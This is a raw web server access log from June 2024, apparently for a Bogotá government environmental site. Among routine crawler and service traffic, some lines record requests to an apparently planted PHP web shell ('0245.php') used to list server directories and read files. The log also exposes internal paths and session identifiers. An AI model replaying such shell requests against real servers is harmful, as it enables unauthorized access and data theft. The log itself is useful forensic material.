172.22.2.4 - - [25/Jun/2024:08:12:49 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01139&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [25/Jun/2024:08:12:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01139&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [25/Jun/2024:08:12:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01139&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [25/Jun/2024:08:13:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [25/Jun/2024:08:13:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2305.pdf HTTP/1.1" 200 293282
201.245.192.253 - - [25/Jun/2024:08:13:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
177.255.9.102 - - [25/Jun/2024:08:13:21 -0500] "GET /distrito-exalto-a-246-empresas-de-bogota-por-su-alto-desempeno-y-responsabilidad-ambiental-durante-2023.html HTTP/1.1" 200 1039
201.245.192.253 - - [25/Jun/2024:08:13:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [25/Jun/2024:08:13:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2487.pdf HTTP/1.1" 200 606934
201.245.192.253 - - [25/Jun/2024:08:13:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 123
201.245.192.253 - - [25/Jun/2024:08:13:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:13:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 1806
201.245.192.253 - - [25/Jun/2024:08:13:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 24
201.245.192.253 - - [25/Jun/2024:08:13:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2686
201.245.192.253 - - [25/Jun/2024:08:13:58 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 7
201.245.192.253 - - [25/Jun/2024:08:14:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 626
201.245.192.253 - - [25/Jun/2024:08:14:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 626
201.245.192.253 - - [25/Jun/2024:08:14:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 13
201.245.192.253 - - [25/Jun/2024:08:14:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 12
216.245.221.92 - - [25/Jun/2024:08:14:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:14:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 153
201.245.192.253 - - [25/Jun/2024:08:14:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [25/Jun/2024:08:14:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2835.pdf HTTP/1.1" 200 476253
201.245.192.253 - - [25/Jun/2024:08:14:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 256
201.245.192.253 - - [25/Jun/2024:08:14:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 916
201.245.192.253 - - [25/Jun/2024:08:14:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 10
201.245.192.253 - - [25/Jun/2024:08:14:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 13
201.245.192.253 - - [25/Jun/2024:08:14:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 1632
157.55.39.59 - - [25/Jun/2024:08:14:13 -0500] "GET /BLA/resoluciones/AUTOS%202013/0479.pdf HTTP/1.1" 200 1591824
201.245.192.253 - - [25/Jun/2024:08:14:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.37 - - [25/Jun/2024:08:14:18 -0500] "GET /cierre-temporal-de-la-sede-principal-de-la-secretaria-de-ambiente-para-atencion-al-publico.html HTTP/1.1" 200 986
216.244.66.195 - - [25/Jun/2024:08:14:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3577.pdf HTTP/1.1" 200 357205
216.244.66.195 - - [25/Jun/2024:08:14:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3585.pdf HTTP/1.1" 200 282223
201.245.192.253 - - [25/Jun/2024:08:15:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:08:15:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3766.pdf HTTP/1.1" 200 378521
201.245.192.253 - - [25/Jun/2024:08:15:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [25/Jun/2024:08:15:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3862.pdf HTTP/1.1" 200 292993
66.249.66.39 - - [25/Jun/2024:08:16:07 -0500] "GET /images/19-04-2024%20Cierre%20temporal%20atencion%20SDA.jpeg HTTP/1.1" 200 40324
201.245.192.253 - - [25/Jun/2024:08:16:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:16:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
181.61.209.39 - - [25/Jun/2024:08:16:24 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
181.61.209.39 - - [25/Jun/2024:08:16:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.125.155 - - [25/Jun/2024:08:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.125.155 - - [25/Jun/2024:08:16:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.125.155 - - [25/Jun/2024:08:16:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.125.142 - - [25/Jun/2024:08:17:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages%5C&sort=2d HTTP/1.1" 200 13451
47.128.125.142 - - [25/Jun/2024:08:17:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.125.142 - - [25/Jun/2024:08:17:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
216.244.66.195 - - [25/Jun/2024:08:17:14 -0500] "GET /BLA/resoluciones/AUTOS%202014/7208.pdf HTTP/1.1" 200 489324
47.128.125.142 - - [25/Jun/2024:08:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
201.245.192.253 - - [25/Jun/2024:08:17:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:17:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [25/Jun/2024:08:17:20 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
47.128.125.155 - - [25/Jun/2024:08:16:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2618.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 532182
47.128.125.161 - - [25/Jun/2024:08:17:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=probe.mer&ft=html&white=1 HTTP/1.1" 200 515
201.245.192.253 - - [25/Jun/2024:08:17:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36691
201.245.192.253 - - [25/Jun/2024:08:17:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:17:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36588
172.22.2.4 - - [25/Jun/2024:08:15:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:08:17:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/0641.pdf HTTP/1.1" 200 236779
172.22.2.4 - - [25/Jun/2024:08:17:41 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=927&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1581
172.22.2.4 - - [25/Jun/2024:08:17:42 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
191.156.180.156 - - [25/Jun/2024:08:17:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0927.pdf HTTP/1.1" 200 509716
216.244.66.195 - - [25/Jun/2024:08:17:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/1725.pdf HTTP/1.1" 200 243891
201.245.192.253 - - [25/Jun/2024:08:18:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [25/Jun/2024:08:18:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/2719.pdf HTTP/1.1" 200 264162
201.245.192.253 - - [25/Jun/2024:08:18:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:16:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
216.244.66.195 - - [25/Jun/2024:08:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/3092.pdf HTTP/1.1" 200 271362
216.244.66.195 - - [25/Jun/2024:08:18:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/3330.pdf HTTP/1.1" 200 360075
216.244.66.195 - - [25/Jun/2024:08:19:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/3390.pdf HTTP/1.1" 200 584096
216.245.221.92 - - [25/Jun/2024:08:19:04 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:08:19:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/3557.pdf HTTP/1.1" 200 196820
201.245.192.253 - - [25/Jun/2024:08:19:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:08:19:30 -0500] "GET /BLA/resoluciones/AUTOS%202019/4457.pdf HTTP/1.1" 200 269353
201.245.192.253 - - [25/Jun/2024:08:19:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:19:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36684
181.61.209.39 - - [25/Jun/2024:08:19:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 277299
201.245.192.253 - - [25/Jun/2024:08:20:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 139
201.245.192.253 - - [25/Jun/2024:08:20:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:20:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 7
201.245.192.253 - - [25/Jun/2024:08:20:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 102
201.245.192.253 - - [25/Jun/2024:08:20:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 1981
201.245.192.253 - - [25/Jun/2024:08:20:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 10
201.245.192.253 - - [25/Jun/2024:08:20:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 24
201.245.192.253 - - [25/Jun/2024:08:20:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2906
201.245.192.253 - - [25/Jun/2024:08:20:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.61.209.39 - - [25/Jun/2024:08:20:18 -0500] "GET /BLA/resoluciones/AUTOS%202012/2261.pdf HTTP/1.1" 200 399931
201.245.192.253 - - [25/Jun/2024:08:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36588
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [25/Jun/2024:08:20:47 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [25/Jun/2024:08:20:47 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [25/Jun/2024:08:20:47 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [25/Jun/2024:08:20:47 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [25/Jun/2024:08:20:47 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
181.61.209.39 - - [25/Jun/2024:08:21:05 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
201.245.192.253 - - [25/Jun/2024:08:21:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 117
201.245.192.253 - - [25/Jun/2024:08:21:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.61.209.39 - - [25/Jun/2024:08:21:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 277299
201.245.192.253 - - [25/Jun/2024:08:21:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:20:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [25/Jun/2024:08:21:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.61.209.39 - - [25/Jun/2024:08:21:35 -0500] "GET /BLA/resoluciones/AUTOS%202012/2861.pdf HTTP/1.1" 200 419575
201.245.192.253 - - [25/Jun/2024:08:22:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
200.118.62.4 - - [25/Jun/2024:08:22:20 -0500] "GET /el-bienestar-de-las-familias-sera-el-tema-central-del-distrito-en-el-mes-de-mayo-bajo-el-lema-nos-movemos-por-las-familias-bogotaavanzaenfamilia.html HTTP/1.1" 200 1139
201.245.192.253 - - [25/Jun/2024:08:22:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [25/Jun/2024:08:23:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:21:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:08:23:22 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
201.245.192.253 - - [25/Jun/2024:08:23:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.206.147.93 - - [25/Jun/2024:08:23:52 -0500] "MGLNDD_190.27.245.106_80" 501 953
216.245.221.92 - - [25/Jun/2024:08:24:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:08:24:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 200 25737
172.22.2.4 - - [25/Jun/2024:08:22:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [25/Jun/2024:08:24:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [25/Jun/2024:08:24:19 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [25/Jun/2024:08:24:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [25/Jun/2024:08:24:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 7779
201.245.192.253 - - [25/Jun/2024:08:24:30 -0500] "POST /appsia/controlador HTTP/1.1" 200 6644
201.245.192.253 - - [25/Jun/2024:08:24:31 -0500] "POST /appsia/controlador HTTP/1.1" 200 9844
201.245.192.253 - - [25/Jun/2024:08:25:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:25:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:26:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.8 - - [25/Jun/2024:08:26:44 -0500] "GET /Publicaciones/2024EE64702.pdf HTTP/1.1" 404 227
201.245.192.253 - - [25/Jun/2024:08:27:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:27:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36691
201.245.192.253 - - [25/Jun/2024:08:27:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:27:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36588
40.77.167.45 - - [25/Jun/2024:08:27:44 -0500] "GET /Publicaciones/2024EE12468.pdf HTTP/1.1" 404 227
201.245.192.253 - - [25/Jun/2024:08:27:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [25/Jun/2024:08:28:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [25/Jun/2024:08:28:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/2874.pdf HTTP/1.1" 304 -
216.245.221.92 - - [25/Jun/2024:08:29:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:08:27:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:29:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:29:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:29:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36684
186.102.52.29 - - [25/Jun/2024:08:29:42 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/q/khJtB62e8WQ4i6ndDC9XR2XWpFgMbamS1LeHSc41u3Qz+eRjzQKBHUgtzkmsPb7QRPOgevR+g==&y=U2FsdGVkX18QOy9UnZBcNNYcAtuD8+zXERc526vWJLm8C8dzym71iR1XbjrWq9s3 HTTP/1.1" 200 30
186.102.52.29 - - [25/Jun/2024:08:29:42 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18N1uzqwtpHN1kYUwWjc0Pix4skoMIUJr/vpvg6xMljJglpIJVvpy4FHMipWvRvV1apQ3wr388ODe9HKNBuIhLP+WGJS1/ave8=&u=U2FsdGVkX19NIxLnUlNaUemmmaODIw2eyQoYnSLZPEs=&y=U2FsdGVkX18QOy9UnZBcNNYcAtuD8+zXERc526vWJLm8C8dzym71iR1XbjrWq9s3 HTTP/1.1" 200 97
